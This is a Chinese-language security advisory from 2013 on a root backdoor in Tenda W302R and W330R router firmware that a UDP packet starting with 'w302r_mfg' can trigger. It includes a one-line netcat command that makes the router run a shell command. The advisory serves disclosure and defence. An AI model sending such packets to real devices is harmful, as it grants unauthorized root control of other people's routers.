发布日期:2013-10-15
更新日期:2013-10-19
受影响系统:
tenda W302R
tenda W330R
描述:
--------------------------------------------------------------------------------
Tenda是深圳的网络设备提供商。
Tenda的 W330R、W302R最新版本的无线路由器固件Medialink MWN-WAPR150N后门存在,漏洞通过一个UDP如果设备收到字符串,可以使用数据包 “w302r_mfg为了开头的数据包,可以触发这个漏洞执行各种命令,甚至是root执行任何命令的权限。后门可以通过LAN及启用了WPS的WLAN加以利用,无法从WAN上利用。
链接:http://www.devttys0.com/2013/10/from-china-with-love/
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能具有攻击性,仅用于安全研究和教学。用户自负风险!
Craig(http://www.devttys0.com/2013/10/from-china-with-love/)提供以下测试方法:
echo -ne "w302r_mfg\x00x/bin/ls" | nc -u -q 5 192.168.0.1 7329
建议:
--------------------------------------------------------------------------------
厂商补丁:
tenda
-----
目前,制造商还没有提供补丁或升级程序。我们建议使用该软件的用户随时关注制造商的主页以获得最新版本: